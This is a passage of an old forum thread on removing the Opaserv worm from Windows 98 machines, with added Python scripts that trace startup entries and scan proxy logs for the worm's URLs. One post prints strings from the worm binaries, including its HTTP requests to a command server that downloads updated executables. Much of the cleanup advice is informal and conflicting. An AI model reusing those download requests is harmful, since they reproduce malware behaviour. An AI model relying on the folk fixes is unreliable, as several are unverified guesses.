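                findings.append((chain, target, "suspect"))
            else:
                findings.append((chain, target, "review"))

    if norm(start) in files:
        walk(norm(start), [])
    return findings


# Constructed sample contents, modelled on the post's description.
INFECTED = {
    r"C:\WINDOWS\WIN.INI": "[windows]\nload=\nrun= c:\\tmp.ini\n"
                           "NullPort=None\n\n[Desktop]\nWallpaper=(None)\n",
    r"C:\tmp.ini": "run= c:\\windows\\scrsvr.exe\n",
}
CLEANED = {r"C:\WINDOWS\WIN.INI": "[windows]\nload=\nrun=\n"}

if __name__ == "__main__":
    for chain, target, verdict in trace_startup(INFECTED):
        print(" -> ".join(chain), "->", target, f"[{verdict}]")
```

Entries marked "review" are startup programs the thread does not name; they are listed so that nothing on the run= line goes unexamined.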

Alfonso (Post #64),
First: Have you actually been infected with this virus? From your post, I tend to doubt it.
Second: I am not using NAV on my machine so I chose to download Norton's removal tool and run it from a floppy. My system is Win98 so the instructions regarding ME and XP obviously do not apply to my situation. The following is taken directly from the Norton's web page for my system:
------------
How to run the tool from a floppy disk
1. Insert the floppy disk that contains the FixOpsrv.exe file in the floppy disk drive.
2. Click Start and then click Run.
3. Type the following and then click OK:
a:\fixopsrv.exe
NOTES:
There are no spaces in the command a:\fixopsrv.exe
If you are running Windows Me and System Restore remains enabled, you will see a warning message. You can choose to run the removal tool with the System Restore option enabled or exit the removal tool.
4. Click Start to begin the process, and then allow the tool to run.
5. If you are running Windows Me, then re-enable System Restore.
------------
Perhaps you could explain to me which step it is I might have missed.
Steve.
PS - for everyone else, please forgive my rant. I rather dislike this sort of better-than-you attitude.

My Problem
My machine is not on a network, but I have been trying to get rid of the Opaserv worm for over a week. I downloaded NAV 2002's definitions and found them unable to fix the problem, I downloaded their Opaserv remover, which seems unable to find the worm, yet every few minutes NAV 2002 warns me about scrsvr.exe. Much of Norton's info about the Opaserv worm doesn't seem to apply to my variety. I have no Tmp.ini or ScrSin.dat and ScrSout.dat files. Trying to open Win.ini brings up a message that it doesn't exist, while it is visible in the folder. Fortunately I have a backup copy, but the active copy keeps getting changed.
Your solutions helped
But this forum has given me two easy things to try: the read-only textfile named scrsvr.exe and renaming the shared C:\ drive. I did this about an hour ago, and so far NAV has been quiet. I am hopeful ...
Thanks for the help.

Best solution we have found is to create a dummy c:\windows\scrsvr.exe file with Read Only Attribute. To do this, open MSDOS and type the following commands:
cd \windows
del scrsvr.exe
echo dummy > scrsvr.exe
attrib -R scrsvr.exe
Ready.
This does not kill the virus,
but it is a banana inside its cum.

EHHH! Error on my commands!!!
The good commands are:
cd \windows
del scrsvr.exe
echo dummy > scrsvr.exe
attrib +r scrsvr.exe
Do you see the difference?

Have this virus too, for over a week. 1st notice something wrong was 100% outbound indicator light on the dialup icons. Loaded free Sygate Personal Firewall from website. It is a magnificent program, showed immediately outbound traffic to IP address 216.xxx (I didn't write it down but could easily bring it back to see)... I allowed Sygate to disable that traffic line. Every 5 minutes or so, it retried and Sygate promptly notified and I continued to disallow traffic. That was the beginning and I am STILL trying to stop it after deleting and redeleting win.ini entries, scrsvr.exe file and hacking it out of the registry.
Thank you all for this thread, good ideas to try tonight, the READ ONLY decoy file and the C drive share rename and password creation.
By the way, I had the C:\tmp.ini file. Also, had run=qtpko.exe and run="oaeooeo".exe files in the MSCONFIG setup. Sorry, not exact memory on the oaeooeo filename, but was VERY close to that.
This same crap on 2 computers at my house, both on ISP dialup.
Additional symptoms, related or not??
1.Mouse buttons keep reversing, won't stay set correctly.
2.Ctrl key on keyboard non functional.
3.Momentary freeze ups, then release. Cannot type long sentences without freeze ups.
4.Often will not shut down.
5.Often starts up and lockup just as systray icons are loading, have to hard reset.

I just had a run with this virus this morning, took care of it. The person who said to use a dummy file is right in that it stops, or pauses the virus. Do a 'files containing text' search for scrsvr.exe, and you will find a few references to it, win.ini, and wintemp.ini in my case. Read them both, there is a copy msvxd.exe to scrsvr.exe line in there, that should be deleted, along with the scrsvr refs. Delete the copied file (in my case it had all the 'real' microsoft information when I checked it with properties), but if it's a real vxd it will have the vxd extension. Then make up a bat file, or add a line to the autoexec.bat that will delete scrsvr.exe before windows starts, (echo y|del c:\windows\scrsvr.exe)
If you want to make sure that you have all references to it removed (I found four refs to it in the reg), download a copy of dev-cpp from bloodshed software, and make up a console app that has a count down delay in it, so it stays visible for a second or two on boot up; that way you know you have all refs out of the system.
I also use the same 'dummy' program to get around a lot of annoying messages, and to disable some features that I don't want or need in some program packages (the live news update, registration reminder and so on on the sblive 5.0 driver disk for one thing), also some of the adware stuff.

I operate a computer services business in the south of England.
I have dealt with and am still dealing with many OpaServ infections, both on networks and stand alone machines.
I have seen this virus magically re-appear on mail servers I have been working on. Once the virus has been removed from the system all is ok. When you connect to the internet something triggers and the virus returns to the system from the Internet. A firewall will keep it out e.g. AlarmZone Pro.
McAfee are aware of the problem, and believe that the OpaServ virus plants a backdoor in the system, but they are still trying to identify the process.
They did release to one customer a test DAT update to hopefully cure this virus, but it did not work (I now have a copy of this Dat update to have a look at).
So if you are seeing this virus mysteriously returning to your system, you are not going mad. Even if you have removed all traces of the virus it can still come back.
The SCRSVR write protected file in the Windows directory will keep it from returning, but it does not cure the problem in the long term.
Also try not to share your Windows or complete C: drive across the network. If you can, switch off all file & print sharing.
I hope this info helps you?
Chris

I had this virus too. I fixed it last night with my own "Polgar fix" :-) Here is a synopsis...
An online industrial auction I check often showed that at 11:55 pm 10/1 my computer accessed and bid heavy on a number of items. As I said, I check often and found this. Called them and tried to find what happened. I run various virus checking utilities regularly. They said I had a hacker, a virus, or disgruntled employee.
I could find no virus. I run zone alarm and noticed 10/5 there was a lot of outbound net traffic and I wasn't doing anything. I had recently gotten zone alarm requests for scrsvr.exe to access the net. (I am not a programmer or anything, I thought it was a screensaver getting some new pics!). I let it. But I noticed it more and more requesting access. So 10/5 I began an internet search. I found it was a virus. The McAfee site said discovered 10/5, no fix and working on it, not much other information yet at that time.
10/6 I used zone alarm to deny scrsvr.exe access to the net. Still could see it pinging but not going through on the sensor. It was tying up resources and was deactivating my security feature! I kept getting zone alarm vsmon shut down after being on for a while. I would have to shut down and reboot to get it to load again.
It looks like this was a time coded virus that was sent out and activated all on or about 10/01. It either copied my clicks or sent info out like passwords to someone who played havoc with the auction. I think it is on auto pilot to be mischievous and acts differently on different setups and configs.
Last night in my research I found this thread. Read it ALL along with other website info. Here is what I did:
1. deny access through zone alarm to scrsvr.exe.
2. couldn't remember how to shut off system restore and disconnected from the net so I didn't shut it off.
3. searched for all the file names listed in this thread. found only scrsvr.exe in windows and tmp.ini in root.
4. used 12 ghosts shredder program and shredded tmp.ini. scrsvr.exe said in use and did not allow shredding, deleting or altering. I tagged it for shredding on next boot.
5. edited win.ini in notepad to remove scrsvr.exe from the cmmpu line.
6. unshared drive c
7. tried to go to regedit but couldn't figure that out so didn't change anything. Same with sysedit.
8. ran msconfig and removed scrsvr.exe from the sys, win, start and some other tab I think too in there.
9. removed scrsvr.exe app from zone alarm permissions totally and rebooted system
10. searched again for all the files. found scrsvr.0 in c:\_restore I could not delete it, remove it or anything else.
11. used 12 ghosts software to shred the file. again it said in use or locked and tagged it to be shredded at next start up.
12. rebooted system
13. searched for all files as before and variances or partials with * wildcard and found nothing. now to test to make sure it is gone.
14. shared drive c again with password for read and another for full.
15. reconnected to internet.
16. browsed around a bit. opening and closing ie and searching websites.
17. internet traffic appeared normal. connection transfer rate was good. no zone alarm requests. when doing nothing no pings signaling and indicator lights stayed blank.
Today, booted and rebooted throughout the day and searched for scr variables and files created today. nothing. same with tmp. Looks like I eradicated it totally with the "polgar fix" :-)
I did not delete any print files or sharing files. I did not create a fake scr files. I only turned off sharing for a while to do the Polgar Fix. I turned it all back on with passwords. I also have some firewall built into the ethernet hub box and zone alarm. Somehow this virus got past both AND was able to DISABLE A SECURITY PROGRAM! (zone alarm component).
I want to thank everyone in this thread. The "Polgar Fix" is a collaboration of almost everyone's ideas and the addition of a couple more of my own. On a hunch I used the 12 ghosts shredding program as it seems the virus figures ways to repair itself. This way it shreds and rewrites many times (I have it set to 20) then writes 000's and truncates it says. whatever that means. That way nothing is left there to find and fix.
If you use this procedure and it works for you please let me know. I just like to know when things go right. I ALWAYS hear when they go wrong heh-heh.
It should work fine for all of your various setups and be able to get your networks running and shared again.
thanks to everyone here for all the help!!!

Sorry for my bad English,
I talk in Spanish....
I share MY SOLUTION with the Opaserv virus - hope it works for all :) -
the virus writes a file in the root directory C:\ named kernel32.dll
this is the same name and size as the kernel32.dll in windows\system directory but in the boot process windows finds this one first.
This file is guilty of downloading the file scrsvr.exe from the internet.
The solution:
Power down the machine.
Boot,
F8
in the menu select:
command line only
delete or rename the file kernel32.dll in c:\
Reboot the machine
Hope it works :)
Best Regards
Pablo

I'm also battling this worm and want to thank everyone for their help and suggestions. I've tried using Symantec's tool; followed directions, it found the virus, removed all traces and inoculated my system. At least that's what it reported; following day I boot and ZoneAlarm alerts me to scrsvr.exe wanting access. Following most of your suggestions I think I'm okay now but did find one piece of info I'd like to share.
While going through ZoneAlarm and eliminating scrsvr.exe from ZA's program list, I found an entry I didn't recognize. ZA has it listed as the program Microsoft QMgr and pointing to the file loadqm.exe which is part of the worm. Hope this helps!
Tom

Tom,
loadqm.exe and Microsoft QMgr aren't part of the worm!!!
well of the Opaserv worm,
maybe the Microsoft Messenger Worm :)
put in google
"loadqm.exe" and see more explanations
Best Regards
Pablo

hi all,
DEFINITIVE SOLUTION TO THIS,
the virus consists of the scrsvr.exe tmp.ini entries in win.ini and the registry that i think you are all aware of
METHOD OF ACTION
when the infected file comes in it sends out the infected machine's IP address - what this means, is that even if you format your machine and reinstall everything, you will be reinfected within mins, if you re-connect to the net - when your av software scans and says your machine is clean, it's true (assuming you have virus definitions new enough to detect it)
the virus systematically scans all IP addresses on port 137 (netbios) and attempts to connect - it WILL connect unless you have the MS share level vulnerability patch AND you have added a password to the C:\ share OR you can use a firewall and block port 137 from all ip addresses
because the virus systematically checks all ip addresses, there is the potential for all win 9x machines (without the MS patch) to become infected - this does not affect win NT/2000 as it doesn't have a share level permission
check : http://vil.nai.com/vil/content/v_99729.htm

Pablo,
I stand corrected. :) In my defense, I did find the loadqm and srcsvr in my startup. I KNOW it was not there before I was infected and have not installed any MS programs in the last year outside of security patches. That and seeing a post elsewhere that indicated loadqm to be part of the worm led me to my post.
Anyway, since the infection I've had a couple of curious problems and am wondering if anyone else has had them. One: when doing a Google search, all the sites that match the subject would be Korean, Brazilian, or French. Very few, if any, US sites. I have since set English in Google's preferences.
Also, file transfers are either extremely slow (0.13K/s) and/or get disconnected. This happens on uls and dls. Anyone experiencing anything similar?
Tom

Thanks for that info Nick, I was unaware of the need for this patch. Can anyone recommend a good firewall? I have ZAP but it doesn't seem to protect me from trojans seeking to update.
Thanks to all

Tom - I experienced the same problem with Google - even though my preference was set to english. I also had a problem with .jpg and .doc files duplicating themselves and showing up in places they didn't belong.

Pest Patrol found a new one identified as a virus source c:\windows\favourites\msn.com.url anyone else got this one? File does not exist on other machines which have not been infected.
This is not what I call fun!!!!!

that is just the msn website! it is not a virus. you probably added it on that machine while doing the fix and getting the new security patch that fixes the vulnerability. or microsoft added it automatically without you knowing or the user had it before.

I don't recollect how I became involved with SCRSRV.exe and its bad business, but after a few hours here's what I came up with on a W98SE machine running Sygate Personal Firewall:
1) SCRSVR.exe is _NOT_ the only file associated with the virus. Search for ALEVIR.exe and BRASIL.exe as well (reasons follow).
2) I didn't go after the hows and whys of registry keys & values
3) I _was_ seeing SCRSVR.exe trying to do I/O to the internet via Sygate, and a number of times killed it right there and then, only to see it pop up as others here have mentioned.
4) I haven't looked into all of the suggestions made above, here, but I offer the data following as a help to them that understand it.
5) Rebooting the OS to control prompt, do the following:
a) rename scrsvr.exe scrsvr.!x! or something as you wish
b) rename alevir.exe alevir.!x!
c) rename brasil.exe brasil.!x!
d) do these commands: copy drwatson.exe scrsvr.exe (and) attrib +r scrsvr.exe (and) copy sol.exe alevir.exe (and) attrib +r alevir.exe (and) copy notepad.exe brasil.exe (and) attrib +r brasil.exe
I used an old MS-DOS utility "XtreePro Gold" to do binary views on the 3 files mentioned above, and found they were all tied to "Opasoft". Fortunately, I was able to cut and paste those binary views to see here.
Starting at ***===***===*** are the views, somewhat edited for readability, for the files in question.
I haven't been able to raise www.opasoft.com or www.n3t.com.br on the 'net.
Good Luck! rjm@soltec.net
***===***===*** FILE: scrsvr.exe
ScrSvr31415 KERNEL32.dll RegisterServiceProcess SOFTWARE\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\Internet Settings ScrSvr ScrSvrOld ProxyEnable ProxyServer
\ScrSvr.exe ScrSin.dat ScrSout.dat scrupd.exe www.opasoft.com
GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1
Host: www.opasoft.com
GET http://www.opasoft.com/work/lastver HTTP/1.1
Host: www.opasoft.com
GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1
Host: www.opasoft.com
POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1
Host: www.opasoft.com
OK PLAIN CIPHER1 KEY ___
WINDOWS\scrsvr.exe WINDOWS\win.ini c:\tmp.ini c:\windows\scrsvr.exe, windows run CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ! LOCALHOST
***===***===*** FILE: alevir.exe
Alevir31415 KERNEL32.dll RegisterServiceProcess SOFTWARE\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\Internet Settings Alevir AlevirOld ProxyEnable ProxyServer
\Alevir.exe Alevir.dat AleSout.dat puta!!.exe www.n3t.com.br.
GET http://www.n3t.com.br/work/sscheduler.php?ver=01&task=newzad&first=0 HTTP/1.1
Host: www.n3t.com.br.
GET http://www.n3.com.br/wwwork/lastver HTTP/1.1
Host: www.n3t.com.br.
GET http://www.n3t.com.br/wwork/scrsvr.exe HTTP/1.1
Host: www.opasoft.com
POST http://www.n3t.com.br/wwork/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1
Host: www.n3t.com.br.
OK PLAIN CIPHER1 KEY ___
WINDOWS\alevir.exe WINDOWS\win.ini c:\put.ini c:\windows\alevir.exe, windows run CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ! LOCALHOST
***===***===*** FILE: brasil.exe
Opasoft Crypted

Maggie
I have followed your instructions in response 12 and it seems to have done the trick
A whole hour on line without a warning from NAV telling me that it has found a scrsvr.exe or a Brasil.exe, Marco!.exe etc / bliss !!
I have been fighting this one since the beginning of October
Thank you
John Aldred

NAV creates a temp file - when a file is quarantined or flagged as a virus a copy of that file is sent to the temp file (usually held in the all users profile). This is then picked up every time AV scans so NAV thinks it's still there - This bug is fixed in SAYEE 8.0.2
Solution -
delete any files found in the temp dir.

There has been a lot of discussion about this worm on the security and virus section of this website.
To sum up, many of us have determined that no anti-virus software can fully remove Opaserv! You have to close off certain ports on your computer!
For details on how to get a fix on where the virus will stop coming back, check out this link:
http://www.computing.net/security/wwwboard/forum/2985.html
Feel free to email me if you have any problems removing this virus.
Brad Peterson
b_peterson@yahoo.com

This thing is insidious. I tried the Kaspersky F-Secure solution and it didn't take care of it. It created at least 4 different executables in my C:\Windows directory: marco!.scr, scrsvr.exe, alevir.exe, brasil.pif, and brasil.exe. It also created Registry entries to execute them and also modified my win.ini file to run these as well. To top it off, it created two more ini files in my C: directory: gay.ini and put.ini.
Trend Micro has a good page which offers a manual solution which worked for me.
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_OPASERV.F
I also disallowed sharing of my C: drive. Good luck to all.
Bill

To clean your system and to prevent it from being infected again, try all suggestions above and then execute this patch; it should fix the problem and the WORM WILL NOT COME BACK AGAIN!!
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-072.asp
...and choose the link that fits your Operating System!

So in SIMPLE terms, can n e one say how to get rid of this worm for GOOD???
its starting to bug me bad!
thanx, JD

Well this worm is really annoying me. I've got the 'H' version apparently, according to NAV2002, which also has brasil.pif, alevir.exe and marco!.scr files.
What I've done so far...
Changed the name of my C drive share to Main.
Shared my files with the NetBEUI protocol, as this worm apparently spreads via TCP/IP.
Created a blank exe file called scrsvr.exe in C:\Windows\
I'm in the process of installing ZoneAlarm Pro, seemingly Norton Personal Firewall didn't stop it going through.
It seems to me however that despite having about 3 different filenames that the virus is known as, they all start from scrsvr.exe, so since I created this blank file, I've had no problems.
I wish Symantec would get a move on though!!
PB

OK, I've knocked up a quick fix for the virus... I hope!
You need to make sure that you've temporarily removed the files via a virus checker, and in the time where they are about to reappear, run this (turn it into a batch file by copying the text into notepad, save as, type: all files, name: fix.bat)
Good luck everyone! Let's lose this bloody worm!
===== CUT AFTER THIS LINE ======
@ECHO OFF
ECHO Opaserv fix
ECHO Peter Butler 2002
ECHO This tool will create fake files to simulate the Opaserv.worm virus
ECHO Creating files...
@ECHO ON
IF EXIST %WINDIR%\scrsvr.exe DEL %WINDIR%\scrsvr.exe
IF EXIST %WINDIR%\brasil.pif DEL %WINDIR%\brasil.pif
IF EXIST %WINDIR%\BRASIL.exe DEL %WINDIR%\BRASIL.exe
IF EXIST %WINDIR%\MARCO!.SCR DEL %WINDIR%\MARCO!.SCR
COPY %WINDIR%\NETWORK.TXT %WINDIR%\SCRSVR.exe
COPY %WINDIR%\NETWORK.TXT %WINDIR%\BRASIL.PIF
COPY %WINDIR%\NETWORK.TXT %WINDIR%\BRASIL.exe
COPY %WINDIR%\NETWORK.TXT %WINDIR%\MARCO!.SCR
ATTRIB +R %WINDIR%\SCRSVR.exe
ATTRIB +R %WINDIR%\BRASIL.PIF
ATTRIB +R %WINDIR%\BRASIL.exe
ATTRIB +R %WINDIR%\MARCO!.SCR
@ECHO OFF
ECHO Replacement completed.
ECHO Good luck

Looked at your solution Peter and was surprised it worked. Only one side remark: your solution goes to version H of the opaserv virus, it's already at K at the moment.
I altered your batch file and made some corrections, and the algemeen.txt is because I am a Dutch user, if you have an English version of Windows then you can use network.txt like you said.
---------------------
@ECHO OFF
ECHO Opaserv fix
ECHO Creator: BCS Business Systems
ECHO By: Bert-Jan van Schalkwijk
ECHO Original:Peter Butler 2002
ECHO This tool will create fake files to simulate the Opaserv.worm virus
ECHO Creating files...
@ECHO ON
set path=c:\windows\command
IF EXIST %WINDIR%\scrsvr.exe DEL %WINDIR%\scrsvr.exe
IF EXIST %WINDIR%\brasil.pif DEL %WINDIR%\brasil.pif
IF EXIST %WINDIR%\BRASIL.exe DEL %WINDIR%\BRASIL.exe
IF EXIST %WINDIR%\MARCO!.SCR DEL %WINDIR%\MARCO!.SCR
IF EXIST %WINDIR%\alevir.exe DEL %WINDIR%\alevir.exe
IF EXIST %WINDIR%\instit.bat DEL %WINDIR%\instit.bat
COPY %WINDIR%\algemeen.TXT %WINDIR%\SCRSVR.exe
COPY %WINDIR%\algemeen.TXT %WINDIR%\BRASIL.PIF
COPY %WINDIR%\algemeen.TXT %WINDIR%\BRASIL.exe
COPY %WINDIR%\algemeen.TXT %WINDIR%\MARCO!.SCR
COPY %WINDIR%\algemeen.TXT %WINDIR%\ALEVIR.exe
COPY %WINDIR%\algemeen.TXT %WINDIR%\INSTIT.BAT
ATTRIB +R %WINDIR%\SCRSVR.exe
ATTRIB +R %WINDIR%\BRASIL.PIF
ATTRIB +R %WINDIR%\BRASIL.exe
ATTRIB +R %WINDIR%\ALEVIR.exe
ATTRIB +R %WINDIR%\INSTIT.BAT
ATTRIB +R %WINDIR%\MARCO!.SCR
@ECHO OFF
ECHO Opaserv Files Replacement completed.
ECHO Good luck, BCS Business Systems

Had the same Opasrv worm problem.
All the related files are,
Brasil.pif, instit.bat, marco!.*, scrsvr.exe, alevir.exe, tmp.ini, gay.ini, put.ini.
Steps to get rid of it,
1)Unshare your C: drive
2)Delete all the above mentioned files. While deleting, if you get an "Access denied" message then you have to use a Process Viewer tool that allows you to view and kill processes (Ms Visual Studio Tools has one)
3)Clean the run line in Win.ini
4)Clean the text in the Registry key....by now everybody must be knowing the location of the key.
How does the Virus get to your system,
1)You must have read from most anti-virus websites, that it is due to a remote infection. The helper is MPREXE.exe, a Microsoft file (residing in C:\Windows\System) that allows incoming Network requests to be routed to a network provider. Let this file be undisturbed, only make sure that you Unshare C: so that it is not accessible remotely (as would be in case it's a proxy/dial up machine).
2)Another possibility could be the below non-existent sites, to which a machine keeps connecting
1)www.gwmnet.com.br/marcos/gayer.php
2)www.opasoft.com/work/scheduler.php
3)www.instituto.com.br/attackDoS.php
4)www.n3t.com.br/work/sscheduler.php
If it's a Proxy then check out the requests with the GET statement, if you find any pointing to the above URLs, then block them in the proxy settings.
If anyone has any knowledge about these phantom URLs and what initiates a client to connect to them, please let it be posted.
regards Savitha
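The proxy check suggested in the post above, written out as an added example that is not part of the thread: it reads proxy access-log lines and lists which LAN clients requested the URLs posted here. The log layout (client address first, request line in double quotes), the function names and the sample lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Host and path pairs taken from the list in the post above.
THREAD_URLS = [
    ("www.gwmnet.com.br", "/marcos/gayer.php"),
    ("www.opasoft.com", "/work/scheduler.php"),
    ("www.instituto.com.br", "/attackDoS.php"),
    ("www.n3t.com.br", "/work/sscheduler.php"),
]

# Assumed layout: client address, anything, then "METHOD absolute-URL HTTP/x.y"
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def classify(url):
    """Return (verdict, host, path) for a listed host, else None.

    The URL is parsed rather than substring-matched, so a listed name that
    only appears inside another site's query string is not a hit. Host
    case, a port number and a trailing dot are normalised away.
    """
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".")
    except ValueError:
        return None
    if not host:
        return None
    verdict = None
    for listed_host, listed_path in THREAD_URLS:
        if host != listed_host:
            continue
        if parts.path.lower() == listed_path.lower():
            return ("listed-url", host, parts.path)
        # Same server, different path: worth a look as well.
        verdict = ("listed-host", host, parts.path)
    return verdict


def infected_clients(log_lines):
    """Map each client address to its hits, in log order."""
    hits = defaultdict(list)
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, url = match.groups()
        hit = classify(url)
        if hit:
            hits[client].append(hit)
    return dict(hits)


# Constructed sample lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    '192.168.0.12 - - [05/Oct/2002:21:14:03 +0000] "GET http://www.opasoft.com'
    '/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1" 503 0',
    '192.168.0.12 - - [05/Oct/2002:21:14:09 +0000] '
    '"GET http://www.opasoft.com/work/lastver HTTP/1.1" 503 0',
    '192.168.0.31 - - [05/Oct/2002:21:15:40 +0000] '
    '"GET http://WWW.N3T.COM.BR./work/sscheduler.php?ver=01 HTTP/1.1" 503 0',
    '192.168.0.40 - - [05/Oct/2002:21:16:02 +0000] '
    '"GET http://www.example.org/index.html HTTP/1.1" 200 5120',
    '192.168.0.40 - - [05/Oct/2002:21:16:30 +0000] "GET http://www.example.org'
    '/?ref=www.opasoft.com/work/scheduler.php HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for client, found in sorted(infected_clients(SAMPLE_LOG).items()):
        for verdict, host, path in found:
            print(client, verdict, host + path)
```

Clients that show up here are the machines to disconnect and clean first.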


This post is quite old and has been locked from receiving new replies. Please create a new posting instead.